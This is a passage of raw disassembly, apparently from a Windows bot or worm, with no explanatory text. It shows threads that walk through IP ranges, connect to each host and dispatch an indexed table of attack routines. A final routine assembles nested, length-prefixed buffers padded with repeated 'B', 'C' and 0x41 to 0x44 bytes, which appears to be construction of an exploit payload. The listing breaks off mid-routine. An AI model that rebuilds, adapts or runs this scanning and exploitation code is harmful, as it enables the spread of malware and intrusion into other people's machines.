xor eax, eax
pop ecx
inc eax
jmp short loc_40C878
; ---------------------------------------------------------------------------
loc_40C857: ; CODE XREF: _0:0040C82B�j
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_415A3C
pop ecx
loc_40C862: ; CODE XREF: _0:0040C7F4�j
push esi
call ds:dword_4E3060 ; closesocket
jmp short loc_40C876
; ---------------------------------------------------------------------------
loc_40C86B: ; CODE XREF: _0:0040C845�j
push offset aSocketClosed_ ; "Socket closed."
loc_40C870: ; CODE XREF: _0:0040C7A8�j
call sub_415A3C
pop ecx
loc_40C876: ; CODE XREF: _0:0040C869�j
xor eax, eax
loc_40C878: ; CODE XREF: _0:0040C855�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C87D proc near ; DATA XREF: sub_40CA91+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
mov ebx, esi
pop ecx
imul ebx, 234h
jmp loc_40CA6E
; ---------------------------------------------------------------------------
loc_40C8C9: ; CODE XREF: sub_40C87D+1FF�j
cmp [ebp+var_10], 0
push eax
jz short loc_40C8DF
lea eax, [ebp+var_150]
push eax
call sub_40C575
pop ecx
jmp short loc_40C8E4
; ---------------------------------------------------------------------------
loc_40C8DF: ; CODE XREF: sub_40C87D+51�j
call sub_40C52D
loc_40C8E4: ; CODE XREF: sub_40C87D+60�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push ds:dword_455F04[ebx]
push [ebp+var_3C]
push edi
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_4488B4
push eax
call sub_41EA60
lea eax, [ebp+var_28C]
push eax
lea eax, dword_455D00[ebx]
push eax
call sub_41EA60
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C611
add esp, 2Ch
cmp eax, 1
jnz loc_40CA63
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40C9B8
push offset dword_4E5110
call ds:dword_4F53A8 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_4488EC
push eax
call sub_41EA60
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40C99A
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40C98E
lea eax, [ebp+var_140]
loc_40C98E: ; CODE XREF: sub_40C87D+109�j
push eax
push [ebp+var_40]
call sub_409C75
add esp, 14h
loc_40C99A: ; CODE XREF: sub_40C87D+EE�j
lea eax, [ebp+var_28C]
push eax
call sub_415A3C
mov [esp+2A8h+var_2A8], offset dword_4E5110
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
jmp loc_40CA63
; ---------------------------------------------------------------------------
loc_40C9B8: ; CODE XREF: sub_40C87D+BE�j
push edi
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_41EA60
mov eax, [ebp+var_20]
shl eax, 6
add eax, offset aSym ; "sym"
push eax
lea eax, [ebp+var_178]
push eax
call sub_41EA60
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40C9FC
lea eax, [ebp+var_140]
loc_40C9FC: ; CODE XREF: sub_40C87D+177�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_41EA60
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call ds:off_4481F4[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40CA63: ; CODE XREF: sub_40C87D+B4�j
; sub_40C87D+136�j
push 7D0h
call ds:dword_4F534C ; Sleep
loc_40CA6E: ; CODE XREF: sub_40C87D+47�j
mov eax, ds:dword_455F04[ebx]
cmp ds:dword_4E3114[eax*8], 0
jnz loc_40C8C9
push esi
call sub_40B9A7
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_40C87D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA91 proc near ; DATA XREF: sub_401C87+1F2E�o
; sub_401C87+5D06�o
var_20C = dword ptr -20Ch
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_14C]
inc ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_4E3008 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_4E3110[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40C049
push 0Bh
call sub_40B8D3
add esp, 150h
cmp eax, ebx
jnz short loc_40CB5F
mov esi, offset dword_4E5110
push esi
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4F53AC ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40CB5F
lea eax, [ebp+var_1CC]
push offset unk_448914
push eax
call sub_41EA60
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40CB49
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409C75
add esp, 14h
loc_40CB49: ; CODE XREF: sub_40CA91+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_415A3C
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40CB5F: ; CODE XREF: sub_40CA91+63�j
; sub_40CA91+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_4F534C
mov edi, ebx
mov ds:dword_4E3114[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40CC21
loc_40CB7D: ; CODE XREF: sub_40CA91+18A�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_448948
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_1CC]
push 0Bh
push eax
call sub_40B691
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov ds:dword_455F04[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C87D
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40CC38
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_44897C
push eax
call sub_41EA60
lea eax, [ebp+var_1CC]
push eax
call sub_415A3C
add esp, 10h
loc_40CC13: ; CODE XREF: sub_40CA91+1AC�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40CB7D
loc_40CC21: ; CODE XREF: sub_40CA91+E6�j
cmp [ebp+var_30], ebx
jz short loc_40CC46
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_40CC53
; ---------------------------------------------------------------------------
loc_40CC34: ; CODE XREF: sub_40CA91+1AA�j
push 1Eh
call esi ; Sleep
loc_40CC38: ; CODE XREF: sub_40CA91+159�j
cmp [ebp+var_4], ebx
jz short loc_40CC34
jmp short loc_40CC13
; ---------------------------------------------------------------------------
loc_40CC3F: ; CODE XREF: sub_40CA91+1C0�j
push 7D0h
call esi ; Sleep
loc_40CC46: ; CODE XREF: sub_40CA91+193�j
mov eax, [ebp+var_2C]
cmp ds:dword_4E3114[eax*8], 1
jz short loc_40CC3F
loc_40CC53: ; CODE XREF: sub_40CA91+1A1�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_4E3110[eax*8]
push eax
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_4489B4
push eax
call sub_41EA60
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40CCA1
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409C75
add esp, 14h
loc_40CCA1: ; CODE XREF: sub_40CA91+1F1�j
lea eax, [ebp+var_1CC]
push eax
call sub_415A3C
mov eax, [ebp+var_2C]
mov [esp+20Ch+var_20C], 0BB8h
mov ds:dword_4E3114[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B8D3
cmp eax, 1
pop ecx
jnz short loc_40CCD8
push offset dword_4E5110
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
loc_40CCD8: ; CODE XREF: sub_40CA91+23A�j
push [ebp+var_2C]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_40CA91 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCE8 proc near ; DATA XREF: sub_40CDB5+7B�o
; sub_40CEA6+7B�o
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 10h
rep movsd
xor esi, esi
push 0
inc esi
mov [eax+0A8h], esi
lea eax, [ebp+var_10]
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_38]
call ds:dword_4E2FC8 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_4E3048 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40CDA6
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov ds:dword_455F0C[ecx], esi
jz short loc_40CDA6
push [ebp+var_38]
push [ebp+var_28]
call ds:dword_4E3054 ; inet_ntoa
push eax
mov edi, offset dword_4E5AD0
push offset unk_4489F4
push edi
call sub_41EA60
push 0
lea eax, [ebp+var_B8]
push [ebp+var_20]
push edi
push eax
push [ebp+var_BC]
call sub_409C75
push edi
call sub_415A3C
add esp, 28h
loc_40CDA6: ; CODE XREF: sub_40CCE8+5D�j
; sub_40CCE8+7E�j
push esi
call ds:dword_4E3060 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40CCE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40CDB5 proc near ; DATA XREF: sub_401C87+60F4�o
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, ds:dword_4F534C
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CDE3: ; CODE XREF: sub_40CDB5+EC�j
push [ebp+var_30]
push [ebp+var_20]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_134]
push offset unk_448A1C
push eax
call sub_41EA60
lea eax, [ebp+var_134]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_455D00
push eax
call sub_41E510
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40CCE8
push edi
push edi
call ds:dword_4F5350 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40CE4F
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CE46: ; CODE XREF: sub_40CDB5+98�j
push 32h
call esi ; Sleep
loc_40CE4A: ; CODE XREF: sub_40CDB5+8F�j
cmp [ebp+var_C], edi
jz short loc_40CE46
loc_40CE4F: ; CODE XREF: sub_40CDB5+8D�j
push [ebp+var_4]
call ds:off_4F533C
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41FBF0
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4E2EF0 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_4E2FC4 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_41FBF0
add esp, 0Ch
jmp loc_40CDE3
sub_40CDB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEA6 proc near ; DATA XREF: sub_401C87+5E0B�o
var_130 = byte ptr -130h
var_B0 = dword ptr -0B0h
var_AC = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_4F534C
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CED4: ; CODE XREF: sub_40CEA6+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_448A44
push eax
call sub_41EA60
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_455D00
push eax
call sub_41E510
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40CCE8
push edi
push edi
call ds:dword_4F5350 ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40CF40
jmp short loc_40CF3B
; ---------------------------------------------------------------------------
loc_40CF37: ; CODE XREF: sub_40CEA6+98�j
push 32h
call esi ; Sleep
loc_40CF3B: ; CODE XREF: sub_40CEA6+8F�j
cmp [ebp+var_8], edi
jz short loc_40CF37
loc_40CF40: ; CODE XREF: sub_40CEA6+8D�j
push [ebp+arg_0]
call ds:off_4F533C
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40CF67
inc [ebp+var_2C]
jmp loc_40CED4
; ---------------------------------------------------------------------------
loc_40CF67: ; CODE XREF: sub_40CEA6+B7�j
push [ebp+var_1C]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_448A70
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_130]
push [ebp+var_14]
push eax
lea eax, [ebp+var_AC]
push eax
push [ebp+var_B0]
call sub_409C75
push [ebp+var_20]
call sub_40B9A7
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CEA6 endp
; =============== S U B R O U T I N E =======================================
sub_40CFB3 proc near ; CODE XREF: sub_40D24D+E�p
; sub_40D24D+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40CFB3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push dword ptr [ebp+8]
call sub_41BC70
pop ecx
push eax
lea ecx, [ebp-8]
push dword ptr [ebp+8]
call sub_40CFEB
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
mov eax, esi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_40CFEB proc near ; CODE XREF: _0:0040CFD5�p
; sub_40D24D+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_41BE40
mov edi, eax
pop ecx
test edi, edi
jz short loc_40D01D
push ebx
push 0
push edi
call sub_41E4B0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_41FBF0
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40D01D: ; CODE XREF: sub_40CFEB+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40CFEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D025 proc near ; CODE XREF: sub_40D117+18�p
; sub_40D191+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_41BE40
mov esi, eax
pop ecx
test esi, esi
jz short loc_40D071
push edi
push 0
push esi
call sub_41E4B0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_41FBF0
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41FBF0
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40D071: ; CODE XREF: sub_40D025+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40D025 endp
; =============== S U B R O U T I N E =======================================
sub_40D07A proc near ; CODE XREF: sub_40D117+5E�p
; sub_40D117+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40D08A
push eax
call sub_41C9D0
pop ecx
loc_40D08A: ; CODE XREF: sub_40D07A+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40D07A endp
; =============== S U B R O U T I N E =======================================
sub_40D093 proc near ; CODE XREF: sub_40D117+20�p
; sub_40D1F2+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40D0BD
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_41BE40
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D0C1
loc_40D0BD: ; CODE XREF: sub_40D093+D�j
xor al, al
jmp short loc_40D113
; ---------------------------------------------------------------------------
loc_40D0C1: ; CODE XREF: sub_40D093+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_41E4B0
add esp, 0Ch
cmp ebx, 1
jnz short loc_40D0E1
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_40D0F6
; ---------------------------------------------------------------------------
loc_40D0E1: ; CODE XREF: sub_40D093+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_40D0F6: ; CODE XREF: sub_40D093+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_41FBF0
add esp, 0Ch
push dword ptr [esi]
call sub_41C9D0
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40D113: ; CODE XREF: sub_40D093+2C�j
pop edi
pop esi
pop ebx
retn
sub_40D093 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D117 proc near ; CODE XREF: sub_40D24D+89�p
; sub_40D24D+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset byte_4E5CD8
call sub_40D025
lea ecx, [ebp+var_8]
call sub_40D093
mov eax, [ebp+var_4]
inc eax
push eax
call sub_41BE40
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D151
xor al, al
jmp short loc_40D18D
; ---------------------------------------------------------------------------
loc_40D151: ; CODE XREF: sub_40D117+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_41E4B0
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_41FBF0
add esp, 18h
mov ecx, esi
call sub_40D07A
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40D07A
mov al, 1
loc_40D18D: ; CODE XREF: sub_40D117+38�j
pop edi
pop esi
leave
retn
sub_40D117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D191 proc near ; CODE XREF: sub_40D1C5+14�p
; sub_40D1E2+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40D025
mov ecx, esi
call sub_40D07A
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40D191 endp
; =============== S U B R O U T I N E =======================================
sub_40D1C5 proc near ; CODE XREF: sub_40D24D+F0�p
; sub_40D24D+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41BC70
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40D191
pop esi
retn 4
sub_40D1C5 endp
; =============== S U B R O U T I N E =======================================
sub_40D1E2 proc near ; CODE XREF: sub_40D22E+B�p
; sub_40D24D+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40D191
retn 8
sub_40D1E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1F2 proc near ; CODE XREF: sub_40D22E+16�p
; sub_40D24D+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40D093
test al, al
jz short loc_40D22B
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push (offset loc_448E17+1)
call sub_40D025
mov ecx, esi
call sub_40D07A
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40D22B: ; CODE XREF: sub_40D1F2+F�j
pop esi
leave
retn
sub_40D1F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D22E proc near ; CODE XREF: sub_40D24D+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40D1E2
test al, al
jz short loc_40D249
mov ecx, esi
call sub_40D1F2
loc_40D249: ; CODE XREF: sub_40D22E+12�j
pop esi
retn 8
sub_40D22E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D24D proc near ; CODE XREF: _0:0040DAA1�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40CFB3
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40D591
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40D591
push esi
lea ecx, [ebp+var_30]
call sub_40CFB3
lea ecx, [ebp+var_20]
call sub_40CFB3
lea ecx, [ebp+var_50]
call sub_40CFB3
lea ecx, [ebp+var_18]
call sub_40CFB3
lea ecx, [ebp+var_40]
call sub_40CFB3
lea ecx, [ebp+var_38]
call sub_40CFB3
lea ecx, [ebp+var_28]
call sub_40CFB3
push 4
push offset dword_448AAC
lea ecx, [ebp+var_30]
call sub_40D191
push 3
push offset dword_448AB4
lea ecx, [ebp+var_30]
call sub_40D191
lea ecx, [ebp+var_30]
call sub_40D117
lea ecx, [ebp+var_30]
call sub_40D1F2
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_41E4B0
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40D191
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40D191
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_40D191
lea ecx, [ebp+var_20]
call sub_40D117
push offset loc_448E1C
lea ecx, [ebp+var_50]
call sub_40D1C5
lea ecx, [ebp+var_50]
call sub_40D117
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_40CFEB
lea ecx, [ebp+var_58]
call sub_40D117
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40D22E
lea ecx, [ebp+var_58]
call sub_40D07A
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_41E4B0
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40D1C5
push 4
push offset dword_448AB8
lea ecx, [ebp+var_18]
call sub_40D191
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40D191
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40D191
lea ecx, [ebp+var_18]
call sub_40D117
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40D1E2
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40D1E2
lea ecx, [ebp+var_40]
call sub_40D1F2
lea ecx, [ebp+var_18]
call sub_40D07A
lea ecx, [ebp+var_50]
call sub_40D07A
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40D1E2
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40D1E2
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40D1E2
lea ecx, [ebp+var_38]
call sub_40D1F2
lea ecx, [ebp+var_20]
call sub_40D07A
lea ecx, [ebp+var_30]
call sub_40D07A
lea ecx, [ebp+var_40]
call sub_40D07A
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40D191
lea ecx, [ebp+var_28]
call sub_40D117
push 2
push offset dword_448E30
